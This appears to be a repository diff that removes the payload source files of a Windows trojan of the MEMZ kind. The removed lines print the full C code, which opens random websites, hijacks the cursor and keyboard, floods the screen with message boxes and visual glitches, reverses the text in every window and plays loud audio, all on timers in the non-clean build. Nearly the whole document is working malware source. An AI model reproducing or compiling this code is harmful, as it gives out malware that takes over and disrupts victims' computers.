PAYLOADFUNCTIONVISUAL(payloadInvert);
PAYLOADFUNCTIONDEFAULT(payloadMessageBox);
DWORD WINAPI messageBoxThread(LPVOID);
LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM);
PAYLOADFUNCTIONDEFAULT(payloadReverseText);
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam);
PAYLOADFUNCTIONDEFAULT(payloadSound);
PAYLOADFUNCTIONVISUAL(payloadGlitches);
PAYLOADFUNCTIONDEFAULT(payloadKeyboard);
PAYLOADFUNCTIONVISUAL(payloadTunnel);
PAYLOADFUNCTIONVISUAL(payloadDrawErrors);
PAYLOADHOST(payloadHostCrazyBus);
#endif

306
WindowsTrojan/Source/payloads.c
View file

@ -1,306 +0,0 @@
#include "memz.h"
PAYLOAD payloads[] = {
#ifdef CLEAN
{ payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 },
#else
{ payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 },
{ payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 },
{ payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 },
{ payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 },
#endif
};
const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD);
BOOLEAN enablePayloads = TRUE;
PAYLOADHOST(payloadHostDefault) {
PAYLOAD *payload = (PAYLOAD*)parameter;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE);
#else
payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
} else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADHOST(payloadHostVisual) {
PAYLOAD *payload = (PAYLOAD*)parameter;
HWND hwnd = GetDesktopWindow();
HDC hdc = GetWindowDC(hwnd);
RECT rekt;
GetWindowRect(hwnd, &rekt);
int w = rekt.right - rekt.left;
int h = rekt.bottom - rekt.top;
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
if (payload->delaytime++ >= payload->delay) {
#ifdef CLEAN
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h);
#else
payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h);
#endif
payload->delaytime = 0;
}
payload->runtime++;
#ifdef CLEAN
}
else {
payload->runtime = 0;
payload->times = 0;
payload->delay = 0;
}
#endif
Sleep(10);
}
}
PAYLOADFUNCTIONDEFAULT(payloadExecute) {
PAYLOADHEAD
ShellExecuteA(NULL, "open", (LPCSTR)Sites[random() % SitesLen], NULL, NULL, SW_SHOWDEFAULT);
out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200);
}
PAYLOADFUNCTIONVISUAL(payloadInvert) {
PAYLOADHEAD
BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
out: return 100;
}
PAYLOADFUNCTIONDEFAULT(payloadCursor) {
PAYLOADHEAD
POINT cursor;
GetCursorPos(&cursor);
SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)));
out: return 2;
}
PAYLOADFUNCTIONDEFAULT(payloadMessageBox) {
PAYLOADHEAD
CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL);
out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30);
}
DWORD WINAPI messageBoxThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING);
UnhookWindowsHookEx(hook);
return 0;
}
LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HCBT_CREATEWND) {
CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs;
if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
HWND hwnd = (HWND)wParam;
int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx);
int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy);
pcs->x = x;
pcs->y = y;
}
}
return CallNextHookEx(0, nCode, wParam, lParam);
}
PAYLOADFUNCTIONDEFAULT(payloadReverseText) {
PAYLOADHEAD
EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL);
out: return 50;
}
BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) {
LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192);
if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) {
strReverseW(str);
SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL);
}
GlobalFree(str);
return TRUE;
}
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
PAYLOADFUNCTIONDEFAULT(payloadSound) {
PAYLOADHEAD
// There seems to be a bug where toggling ALL payloads kills the sound output on some systems.
// I don't know why this happens, but using SND_SYNC seems to fix the bug.
// But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload.
// As this only happens for the enable-disable part, I will only include that in the clean build as a workaround.
#ifdef CLEAN
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_SYNC);
out: return random() % 10;
#else
PlaySoundA(sounds[random() % (sizeof(sounds)/sizeof(sounds[0]))], GetModuleHandle(NULL), SND_ASYNC);
out: return 20 + (random() % 20);
#endif
}
PAYLOADFUNCTIONVISUAL(payloadGlitches) {
PAYLOADHEAD
int x1 = random() % (w - 400);
int y1 = random() % (h - 400);
int x2 = random() % (w - 400);
int y2 = random() % (h - 400);
int width = random() % 400;
int height = random() % 400;
BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 3;
}
PAYLOADFUNCTIONDEFAULT(payloadKeyboard) {
PAYLOADHEAD
INPUT input;
input.type = INPUT_KEYBOARD;
input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30;
SendInput(1, &input, sizeof(INPUT));
out: return 300 + (random() % 400);
}
PAYLOADFUNCTIONVISUAL(payloadTunnel) {
PAYLOADHEAD
StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY);
out: return 200.0 / (times / 5.0 + 1) + 4;
}
PAYLOADFUNCTIONVISUAL(payloadDrawErrors) {
PAYLOADHEAD
int ix = GetSystemMetrics(SM_CXICON) / 2;
int iy = GetSystemMetrics(SM_CYICON) / 2;
POINT cursor;
GetCursorPos(&cursor);
DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR));
if (random() % (int)(10/(times/500.0+1)+1) == 0) {
DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING));
}
out: return 2;
}
PAYLOADHOST(payloadHostCrazyBus) {
PAYLOAD *payload = (PAYLOAD*)parameter;
WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };
HWAVEOUT hwo;
waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);
const int bufsize = 44100 * 30; // 30 Seconds
char *wavedata = (char *)LocalAlloc(0, bufsize);
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
for (;;) {
#ifdef CLEAN
if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
#endif
int freq = 0;
for (int i = 0; i < bufsize; i++) {
if (i % (44100 / 4) == 0)
freq = 44100 / ((random() % 4000) + 1000);
wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100);
}
#ifdef CLEAN
waveOutReset(hwo);
#endif
waveOutWrite(hwo, &hdr, sizeof(hdr));
while (!(hdr.dwFlags & WHDR_DONE)
#ifdef CLEAN
&& (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED)
#endif
) {
Sleep(1);
}
#ifdef CLEAN
if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) {
waveOutPause(hwo);
}
} else {
Sleep(10);
}
#endif
}
}

33
WindowsTrojan/Source/payloads.h
View file

@ -1,33 +0,0 @@
#pragma once
#include "memz.h"
#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
typedef struct {
PAYLOADHOST(*payloadHost);
void *payloadFunction;
#ifdef CLEAN
wchar_t *name;
BOOLEAN safe;
HWND btn;
int delaytime, delay, runtime, times;
#else
int startDelay;
int delaytime, delay, runtime, times;
#endif
} PAYLOAD;
#ifdef CLEAN
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD if (skip) goto out;
#else
#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
extern PAYLOAD payloads[];
extern const size_t nPayloads;

2
WindowsTrojan/Source/utils.c
View file

@ -1,4 +1,4 @@
#include "memz.h"
#include "MEMZ.h"
HCRYPTPROV prov;